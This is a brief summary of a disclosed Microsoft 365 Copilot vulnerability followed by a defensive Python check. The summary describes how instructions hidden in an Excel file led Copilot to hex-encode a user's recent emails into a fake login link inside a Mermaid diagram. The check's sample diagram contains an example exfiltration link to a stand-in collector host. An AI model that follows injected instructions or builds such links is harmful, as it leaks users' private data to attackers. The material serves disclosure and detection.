A security researcher discovered a data exfiltration vulnerability in Microsoft 365 Copilot that combined indirect prompt injection with Mermaid diagram CSS manipulation. By embedding malicious instructions in an Excel document, the researcher triggered Copilot to fetch sensitive tenant data such as recent emails, hex-encode it, and embed the encoded data in the hyperlink of a fake login button within a Mermaid diagram. When the button was clicked, the link transmitted the data to an attacker's server. Microsoft patched the vulnerability by removing the ability to interact with dynamic content in rendered Mermaid diagrams. The researcher received no bounty, as M365 Copilot was out of scope at the time.
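A defender-side check for the pattern described above, as an added example that is not from the original writeup or from Microsoft: it scans Mermaid source produced by an assistant for links to non-allowlisted hosts whose URL carries a long hex run that decodes to readable text. The `click ... href` carrier in the sample, the 16-byte threshold, the function names and the host names are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: links appear in the diagram source as plain http(s) URLs.
URL_RE = re.compile(r"https?://[^\s\"'<>)\]]+", re.IGNORECASE)
# Assumption: 16 or more hex-encoded bytes in a URL is worth a look.
HEX_RUN_RE = re.compile(r"(?:[0-9a-fA-F]{2}){16,}")

def decode_if_text(hex_run):
    """Return the decoded string if the run is mostly printable UTF-8, else None."""
    try:
        text = bytes.fromhex(hex_run).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    printable = sum(ch.isprintable() or ch.isspace() for ch in text)
    return text if printable / len(text) >= 0.9 else None

def audit_mermaid(source, allowed_hosts=frozenset()):
    """Flag URLs to non-allowlisted hosts that carry hex-encoded readable text."""
    findings = []
    for url in URL_RE.findall(source):
        host = (urlparse(url).hostname or "").lower()
        if host in allowed_hosts:
            continue
        for run in HEX_RUN_RE.findall(url):
            decoded = decode_if_text(run)
            if decoded is not None:
                findings.append({
                    "host": host,
                    "hex_bytes": len(run) // 2,
                    "preview": decoded[:40],
                })
    return findings

# Constructed sample: a "Login" node whose link carries hex-encoded mail text.
SAMPLE_HEX = "Subject: Q3 forecast draft".encode().hex()
SAMPLE_DIAGRAM = f'''flowchart TD
    A["Login"]
    click A href "https://collector.example/login?d={SAMPLE_HEX}"
    B["Docs"]
    click B href "https://learn.microsoft.com/en-us/"
'''

if __name__ == "__main__":
    for finding in audit_mermaid(SAMPLE_DIAGRAM):
        print(finding)
```

A check like this belongs on the model's output before rendering; it complements the fix described above, which removes interactivity from rendered diagrams.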